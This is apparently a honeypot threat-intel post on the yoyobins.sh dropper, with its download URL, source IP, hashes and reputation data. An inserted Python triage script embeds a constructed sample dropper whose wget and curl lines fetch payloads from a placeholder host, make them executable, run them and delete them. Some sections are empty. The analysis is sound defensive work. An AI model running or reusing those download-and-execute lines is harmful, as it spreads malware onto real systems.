Script Analysis - yoyobins.sh
In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week. I’ll do some basic analysis of the file to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.
This week we’re looking at yoyobins.sh, a malicious shell script acting as a malware dropper. My logs show an American IP address logging into my honeypot, then reaching out to a Croatian IP for the dropper, yoyobins.sh. When the script runs, it requests a number of additional payloads and attempts to save them to various directories (/tmp, /var/run, /root). Once a payload is saved, the script changes its permissions to make it executable, runs it, then deletes it after it completes.
Filename: yoyobins.sh
Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP: 104.248.48.57
Downloaded from: http://45.95.168.196/yoyobins.sh
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link: https://www.virustotal.com/gui/file/bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1/detection
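The dropper behaviour described above (fetch a payload, save it under /tmp, /var/run or /root, chmod it, run it, delete it) can be triaged statically before anything is detonated. The Python below is an added example written for this post; it is not code from the post, from the honeypot, or from the malware. It computes the same identifiers VirusTotal reports (MD5, SHA-1, SHA-256, size), checks for a shell shebang, and pulls the download URLs, working directories, chmod targets, executed paths and deleted paths out of a script with regular expressions, then labels the sample. The embedded SAMPLE_DROPPER is constructed to imitate the pattern described above and is not the contents of yoyobins.sh; its payload host is an RFC 5737 documentation address, and all function and pattern names are my own.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Constructed sample, NOT the contents of yoyobins.sh. It imitates the pattern the
# post describes (cd into /tmp, /var/run or /root; fetch payloads; chmod; run; delete)
# and uses a documentation-range address (RFC 5737) as the payload host.
SAMPLE_DROPPER = b"""#!/bin/bash
cd /tmp || cd /var/run || cd /root
wget http://198.51.100.10/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86; rm -rf /tmp/x86
curl -O http://198.51.100.10/arm7 ; chmod 777 arm7; ./arm7; rm -rf arm7
"""

URL_RE = re.compile(r'https?://[^\s;"\'|&<>]+')
CD_RE = re.compile(r'\bcd\s+(/[^\s;|&]*)')
CHMOD_RE = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\s+([^\s;|&]+)')
RM_RE = re.compile(r'\brm\s+(?:-\S+\s+)*([^\s;|&]+)')
# A token starting with "/" or "./" directly after a line start or a command
# separator (; & |) is the script executing a file by path.
EXEC_RE = re.compile(r'(?:^|[;&|])\s*(\.?/[^\s;|&]+)', re.MULTILINE)


def _dedupe(items):
    """Drop repeats but keep first-seen order, so the report reads like the script."""
    seen = []
    for item in items:
        if item not in seen:
            seen.append(item)
    return seen


def file_hashes(data: bytes) -> dict:
    """Return the identifiers VirusTotal lists for a file: MD5, SHA-1, SHA-256, size."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
    }


def extract_iocs(text: str) -> dict:
    """Pull network and filesystem indicators out of a plain-text shell dropper."""
    urls = _dedupe(URL_RE.findall(text))
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    return {
        "urls": urls,
        "hosts": hosts,
        "work_dirs": _dedupe(CD_RE.findall(text)),
        "chmod_targets": _dedupe(CHMOD_RE.findall(text)),
        "executed": _dedupe(EXEC_RE.findall(text)),
        "deleted": _dedupe(RM_RE.findall(text)),
    }


def classify(iocs: dict) -> str:
    """Label the sample from the combination of indicators found."""
    if iocs["urls"] and iocs["chmod_targets"] and iocs["executed"]:
        return "dropper (self-deleting)" if iocs["deleted"] else "dropper"
    if iocs["urls"]:
        return "downloader"
    return "unknown"


def triage(data: bytes) -> dict:
    """Full static triage: hashes, shebang check, indicators and verdict."""
    text = data.decode("utf-8", errors="replace")
    first_line = text.splitlines()[0] if text else ""
    report = file_hashes(data)
    # Mirrors the "Bourne-Again shell script" magic: a #! line naming a *sh interpreter.
    report["shell_shebang"] = first_line.startswith("#!") and first_line.rstrip().endswith("sh")
    iocs = extract_iocs(text)
    report.update(iocs)
    report["verdict"] = classify(iocs)
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_DROPPER), indent=2))
```

To run it against a captured file, replace SAMPLE_DROPPER with the bytes read from the honeypot's download directory; the hashes can then be compared with the VirusTotal values before submitting anything. The regular expressions only see plain-text commands, so a dropper that base64-encodes or otherwise obfuscates its commands will still hash correctly but come back as "unknown", which is itself a useful signal to look closer.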
File Contents:

Initiating Source IP Analysis:
Analysis Date | 2020-06-08 21:39:51
Elapsed Time | 2 seconds
Blacklist Status | BLACKLISTED 11/114
IP Address | 104.248.48.57
Reverse DNS | prod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24
ASN | AS14061
ASN Owner | DIGITALOCEAN-ASN
ISP | Digital Ocean
Continent | North America
Country Code |
Latitude / Longitude | 40.793 / -74.0247
City | North Bergen
Region | New Jersey
Download URL Analysis:
Analysis Date | 2020-06-08 21:40:37
Elapsed Time | 3 seconds
Blacklist Status | BLACKLISTED 6/114
IP Address | 45.95.168.196
Reverse DNS | slot0.ormardex.com
ASN | AS42864
ASN Owner | Giganet Internet Szolgaltato Kft
ISP | MAXKO j.d.o.o.
Continent | Europe
Country Code |
Latitude / Longitude | 45.4675 / 16.3868
City | Sisak
Region | Sisacko-Moslavacka Zupanija
Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious
Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)
Contacted URLs:
Windows Defender:

Virus Total Graph Summary:
